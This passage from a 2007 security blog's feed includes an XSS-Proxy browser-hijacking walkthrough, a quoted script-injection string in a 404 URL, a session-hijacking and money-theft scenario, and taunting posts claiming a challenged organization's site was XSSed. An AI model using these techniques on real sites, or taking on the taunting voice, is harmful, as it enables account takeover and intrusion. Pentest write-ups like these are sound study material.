src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_Zx8XWzC_KPQ/RxdmPpewLkI/AAAAAAAAAd4/axbyWYack2Y/s72-c/fucked.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-9220584333982370200</id><published>2007-10-12T10:34:00.000+08:00</published><updated>2007-10-12T11:12:26.725+08:00</updated><title type='text'>XSS-Proxy PoC</title><content type='html'>The other day, I was thinking about how I could actually get more sales during meeting sessions with customers, and with the current bloom of website hacking, I thought it's time to actually show customers what I can do and the impact of an XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and I decided to go with a tool called XSS-Proxy. All I can say is this tool is really light and easy to use. All you need is just Perl and a web server running on your machine, and one would just have to launch the listener from there with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spent some time with me explaining how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. For those of you guys who would love to try this tool, download it at &lt;a href="http://xss-proxy.sourceforge.net"&gt;http://xss-proxy.sourceforge.net&lt;/a&gt;. 
There are also Advanced XSS Attacks and a mini whitepaper for further reading.&lt;br /&gt;&lt;br /&gt;First, start up XSS-Proxy:&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7f_JewLeI/AAAAAAAAAdI/uh0DYl4gUqI/s1600-h/startup+xss-proxy.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7f_JewLeI/AAAAAAAAAdI/uh0DYl4gUqI/s400/startup+xss-proxy.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5120276102336490978" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Then inject a script tag into the victim page, be it persistent or reflected; try it to see it for yourself.&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/Rw7gh5ewLfI/AAAAAAAAAdQ/PhHIqRTu3Co/s1600-h/injection+point.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/Rw7gh5ewLfI/AAAAAAAAAdQ/PhHIqRTu3Co/s400/injection+point.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5120276699336945138" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The admin page contains the links that the victim has visited, and by clicking those links you can choose to redirect and hijack the victim's browser within the same document domain.&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7jUJewLgI/AAAAAAAAAdY/Jno_sU57ia0/s1600-h/admin+page.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7jUJewLgI/AAAAAAAAAdY/Jno_sU57ia0/s400/admin+page.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5120279761648627202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A sample of the redirect attack. 
Observe the grey bar below with "Opening page..".&lt;br /&gt;This is achieved by clicking, on the admin page, one of the links the victim had visited: I wanted the victim to visit another page, so I chose the link I wanted the victim to visit and clicked on it. On the victim's side, he will automatically be redirected to the page I chose.&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7kWJewLhI/AAAAAAAAAdg/vQbgcVk5kds/s1600-h/redirect.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7kWJewLhI/AAAAAAAAAdg/vQbgcVk5kds/s400/redirect.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5120280895519993362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And finally, I can even proxy JavaScript injection into the victim's browser. A simple one would be alert('XSS');&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rw7l_pewLjI/AAAAAAAAAdw/y4-NmuemPXk/s1600-h/xss.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rw7l_pewLjI/AAAAAAAAAdw/y4-NmuemPXk/s400/xss.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5120282707996192306" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-9220584333982370200?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/9220584333982370200/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=9220584333982370200' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9220584333982370200'/><link rel='self' 
type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9220584333982370200'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/xss-proxy-poc.html' title='XSS-Proxy PoC'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/Rw7f_JewLeI/AAAAAAAAAdI/uh0DYl4gUqI/s72-c/startup+xss-proxy.JPG' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8892382090546248158</id><published>2007-10-10T02:16:00.000+08:00</published><updated>2007-10-10T02:34:52.569+08:00</updated><title type='text'>AppCodeScan beta Released</title><content type='html'>A few minutes ago, Shreeraj just updated me on the release of a new tool from Blueinfy. This tool basically checks your source code for potential entry points for XSS, SQL injection, poor validation, etc. Well, personally I have not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try; it's free anyway. The tool is called AppCodeScan, and for those who have already tried the tool, feel free to let me know, as trust me, I am really eager to try this one. Also, check out Fortify's source code scanning tool, which has similar functions and usage. The only difference is maybe the support and that it's an enterprise tool. At the same time, do check out their cost and you will know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how. 
Thank you Shreeraj.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blueinfy.com/tools.html"&gt;http://blueinfy.com/tools.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8892382090546248158?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8892382090546248158/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8892382090546248158' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8892382090546248158'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8892382090546248158'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/appcodescan-beta-released.html' title='AppCodeScan beta Released'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7369733849052789960</id><published>2007-10-08T17:47:00.001+08:00</published><updated>2007-10-08T17:52:21.786+08:00</updated><title type='text'>Try this at your own risk, COKE Machine hacked!!</title><content type='html'>I was checking PDP's hack on Citrix and I stumbled across a coke machine hack. Well, I am not sure if this is an old exploit, or if it is still working as of today, or if it is patched. However, I could not replicate this hack on a vending machine here. Maybe it is a different model or different system or different chipset. 
Whatever it is, this is a cool one. Simple yet effective.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/FqFEvYfVdVQ"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/FqFEvYfVdVQ" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7369733849052789960?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7369733849052789960/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7369733849052789960' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7369733849052789960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7369733849052789960'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/try-this-at-your-own-risk.html' title='Try this at your own risk, COKE Machine hacked!!'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-500784603953129207</id><published>2007-10-07T20:23:00.000+08:00</published><updated>2007-10-07T20:28:38.955+08:00</updated><title type='text'>Just another XSS</title><content type='html'>Well, i am getting tired of your site "big 
organization". PoC shown with screenshots of your site being XSSed numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. Whatever you decide, I wish you good luck and all the best. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RwjQ2pewLdI/AAAAAAAAAdA/awQSPUwtG6w/s1600-h/JAXss.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RwjQ2pewLdI/AAAAAAAAAdA/awQSPUwtG6w/s400/JAXss.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5118570613772922322" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-500784603953129207?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/500784603953129207/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=500784603953129207' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/500784603953129207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/500784603953129207'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/just-another-xss.html' title='Just another XSS'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RwjQ2pewLdI/AAAAAAAAAdA/awQSPUwtG6w/s72-c/JAXss.JPG' height='72' 
width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4868128569039581100</id><published>2007-10-06T08:22:00.000+08:00</published><updated>2007-10-06T11:45:42.637+08:00</updated><title type='text'>Prevention is better than Cure</title><content type='html'>With over 6 years of experience in penetration tests of all sorts of systems, from networks to web applications to databases and many others, I can say that I have successfully achieved my goals as a "hacker" or a white hat. As usual, I am constantly keeping myself abreast of the latest exploits and hacking methodology. I am not really a true researcher, but rather a guy who loves to read all sorts of hacking books and articles. &lt;br /&gt;&lt;br /&gt;Well, with the recent work I am doing on web applications, I can say that most web applications are truly insecure and hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea how important secure programming is. Once they are hacked, their reputation is gone and data is lost. From what I see, customers are always eager to launch their application online, maybe because of a certain time frame they have to meet, or maybe because they are eager to let consumers know more about their services and products, but they did not think about security in their applications as a whole. Well, I would advise them to think twice and consider the possibility of being hacked hard. Below are a few guidelines that I got from Jeremiah's whitepaper; after reading it, I feel that it is important to embrace them, rather than treating it just like another whitepaper.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Secure Code&lt;/strong&gt;: Application developers must consider security&lt;br /&gt;from the beginning. 
Involve the security staff early in the&lt;br /&gt;process.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;QA Development&lt;/strong&gt;: Experienced staff must perform periodic&lt;br /&gt;security as well as usability reviews.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Stay up-to-date on patches and stay configured securely.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Continuous assessments&lt;/strong&gt;: Covering both technical and logical&lt;br /&gt;issues on the production web site as it is being changed.&lt;br /&gt;&lt;br /&gt;Also, for those who are paranoid about your web applications and have no budget to spend, you guys should install a Web Application Firewall like ModSecurity to shield off most of the attacks; moreover, it is customizable, so you can add your own ruleset. There are also a few other open source WAFs like PHP-IDS for XSS, URLScan for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what you really need.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4868128569039581100?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4868128569039581100/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4868128569039581100' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4868128569039581100'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4868128569039581100'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/preventation-is-better-than-cure.html' title='Prevention is better than 
Cure'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6091172967553655805</id><published>2007-10-05T20:27:00.000+08:00</published><updated>2007-10-05T20:37:00.946+08:00</updated><title type='text'>Another hole????</title><content type='html'>Hey "big organization", this needs no explanation. You have been owned again. Well, I am smart not to let you see the actual URL string, or else you will secure yourself? Still call me a script kiddie?? Think harder. Challenge me?? Why not do something about your site rather than challenging people here and there? Need to know the actual payload and URL string? Call me. You are lucky I didn't use XSS to portscan your internal network or cause a defacement and make you look like a fool. Respect others and respect yourself.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/RwYv1ZewLcI/AAAAAAAAAc4/4vcJHRSV7g4/s1600-h/fucked.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/RwYv1ZewLcI/AAAAAAAAAc4/4vcJHRSV7g4/s400/fucked.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5117830620972592578" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6091172967553655805?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6091172967553655805/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6091172967553655805' title='9 Comments'/><link 
rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6091172967553655805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6091172967553655805'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/another-hole.html' title='Another hole????'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_Zx8XWzC_KPQ/RwYv1ZewLcI/AAAAAAAAAc4/4vcJHRSV7g4/s72-c/fucked.JPG' height='72' width='72'/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2982220292542798732</id><published>2007-10-04T15:41:00.001+08:00</published><updated>2007-10-04T15:50:16.399+08:00</updated><title type='text'>You are OwNED!!!</title><content type='html'>Hey "big organization", I don't think I need to prove too much. Check out your logs or something. Check out whatever you have. I just spent roughly around 5 minutes on your site and I got what I wanted. Well, I don't think you are worth my precious time doing good for your site. This is just a simple test. I can do more damaging stuff, but well, I don't see the point of doing more damage. I don't have to prove any more. Take this shit from me and do your part. 
Peace.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RwSbIZewLbI/AAAAAAAAAcw/j_hqE2vFEwQ/s1600-h/owned.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RwSbIZewLbI/AAAAAAAAAcw/j_hqE2vFEwQ/s400/owned.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5117385645180857778" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2982220292542798732?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2982220292542798732/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2982220292542798732' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2982220292542798732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2982220292542798732'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/you-are-owned.html' title='You are OwNED!!!'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_Zx8XWzC_KPQ/RwSbIZewLbI/AAAAAAAAAcw/j_hqE2vFEwQ/s72-c/owned.JPG' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7756176928239157605</id><published>2007-10-03T19:18:00.000+08:00</published><updated>2007-10-03T19:29:57.602+08:00</updated><title 
type='text'>Challenge me on Web Application Security???</title><content type='html'>One day after the application penetration test, I was contacted by a huge organization who apparently views/reads my blog. Basically, they issued a challenge to test my knowledge and skills in web application security assessment. Well, I don't really care or bother how huge your organization is; I accept your challenge and I will show you that your public facing website will be used as a zombie for unidentified attacks. Don't blame me for that. You issued a challenge and I responded. I don't have anything to prove, except that I would love to see how good your web security is. &lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7756176928239157605?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7756176928239157605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7756176928239157605' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7756176928239157605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7756176928239157605'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/challenge-me-on-web-application.html' title='Challenge me on Web Application Security???'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7164348840388337390</id><published>2007-10-02T22:16:00.000+08:00</published><updated>2007-10-02T22:34:57.661+08:00</updated><title type='text'>Session ID Manipulation?????</title><content type='html'>So today is the last day of Phase 1 of my application pentest. Well, it's always funny because it's always on the last day that I find something. In my previous posts, I was saying that the application is very secure. However, I found some session ID manipulation that allows an attacker to impersonate someone. Well, although it's not high risk, think of this situation. Let's say you and your friend are at a school compound or somewhere with network access and suddenly your friend is checking his account. With the mindset of a hacker, you know that manipulating the session ID will allow you to gain access to his account; while he says that he wants to go to the toilet and forgets to log out, you quickly grab his session ID and then change his password. From there on, you can monitor his account's transactions and status, and moreover you can transfer money to your own account. I mean, there are too many possibilities. This is just one of the scenarios. You can let your imagination run wild and come up with more evil stuff. However, I just want to point out that since the application is already so secure, why not take another step to tighten this hole? 
Agree?????&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7164348840388337390?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7164348840388337390/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7164348840388337390' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7164348840388337390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7164348840388337390'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/sessionn-id-manipulation.html' title='Session ID Manipulation?????'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1019403499779638051</id><published>2007-10-01T15:57:00.000+08:00</published><updated>2007-10-01T16:04:36.560+08:00</updated><title type='text'>Owning Axis IP Cameras</title><content type='html'>Over the weekend, I had the time to review a whitepaper written by both Adrian Pastor and Amir Azam. In that article, they displayed certain XSS techniques that allowed an attacker to own the IP cameras and monitor them. Well, I would say that this is not too bad of an article, as PoC is included. It is still the same old XSS that is doing the trick, and CSRF that allows creation of admin accounts. The firmware for Axis is just crap. 
They should brush up on their security to avoid more security issues. For those who are interested, do check it out at&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.gnucitizen.org/blog/owning-big-brother-hollywood-style-exploits-included"&gt;http://www.gnucitizen.org/blog/owning-big-brother-hollywood-style-exploits-included&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1019403499779638051?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1019403499779638051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1019403499779638051' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1019403499779638051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1019403499779638051'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/owning-axis-ip-cameras.html' title='Owning Axis IP Cameras'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1180997368774030958</id><published>2007-10-01T13:18:00.001+08:00</published><updated>2007-10-01T13:38:48.466+08:00</updated><title type='text'>2 Factor Authentication Last Update</title><content type='html'>I think I am more or less done with my scope of work. There is simply no chance in hell that I can break that application. 
It's like no matter what I entered, I always get a "service not available" or "please try again later". I verified all the injection points and the stuff that I can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escapes all output characters. Lastly, every error message that is output is a generic error message with no other information. The only last thing I am trying now is XSS on a 404 error page to see how it reacts. Still, this is what I got&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RwCH2pewLaI/AAAAAAAAAco/-LHMPXsNkLQ/s1600-h/404.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RwCH2pewLaI/AAAAAAAAAco/-LHMPXsNkLQ/s400/404.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5116238549610409378" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And the generated source I got after the XSS:&lt;br /&gt;&lt;br /&gt;[404 Not Found&lt;br /&gt;Not Found&lt;br /&gt;The requested URL /x/--&amp;gt;&amp;lt;script&amp;gt;alert("XSS")&amp;lt;/script&amp;gt;&amp;lt;!--&amp;amp;node=465600 was not found on this server.]&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1180997368774030958?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1180997368774030958/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1180997368774030958' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1180997368774030958'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1180997368774030958'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/2-factor-authentication-last-update.html' title='2 Factor Authentication Last Update'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RwCH2pewLaI/AAAAAAAAAco/-LHMPXsNkLQ/s72-c/404.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2040571819403986663</id><published>2007-09-30T22:31:00.000+08:00</published><updated>2007-09-30T22:42:59.977+08:00</updated><title type='text'>Have you downloaded your scancode?</title><content type='html'>I was reading Shreeraj's article about source code review, and it was overall a basic yet simple article on source code reviewing. Basically, in the article, he teaches the audience everything from dependency determination to mitigation and countermeasures for a web application. On top of it, he included a tool he coded himself called "scancode", which is used to scan source code for potential entry points for XSS and SQLi. This is a must read for those who want to know more about the source code reviewing process and methodology. Download scancode on page 3 of the article, right at the bottom.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html"&gt;http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;These days, I am so involved with application security that I have neglected the networking area. Well, I am trying to shift myself slowly away from the technical side of things and wish to be more involved in business and development stuff. 
